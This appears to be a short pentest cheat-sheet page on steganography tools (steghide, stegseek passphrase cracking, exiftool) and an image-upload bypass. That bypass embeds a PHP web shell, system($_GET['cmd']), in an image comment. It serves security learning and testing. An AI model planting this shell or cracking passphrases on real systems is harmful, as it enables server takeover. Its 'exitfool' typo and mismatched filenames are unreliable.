Steganography

apt-get install steghide
steghide extract -sf picture.jpg
steghide info picture.jpg
apt-get install stegosuite

Stegseek to crack passphrase

https://github.com/RickdeJager/stegseek

stegseek [stegofile.jpg] [wordlist.txt]

#Detection and passwordless extraction
#Stegseek can also be used to detect and extract any unencrypted (meta) 
#data from a steghide image. This exploits the fact that the random number 
#generator used in steghide only has 2^32 possible seeds, 
#which can be bruteforced in a matter of minutes.

stegseek --seed [stegofile.jpg]

exiftool

exitfool hello.jpg

PHP getimagesize()

For file uploads which validate image size using php getimagesize(), it may be possible to execute shellcode by inserting it into the Comment attribute of Image properties and saving it as file.jpg.php.

You can do this with gimp or exiftools:

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
mv file.jpg file.php.jpg

PreviousNSE Scripts NextServices Enumeration

Last updated 5 years ago

hashtagSteganography

hashtagStegseek to crack passphrase

hashtagexiftool

hashtagPHP getimagesize()

Steganography

Stegseek to crack passphrase

exiftool

PHP getimagesize()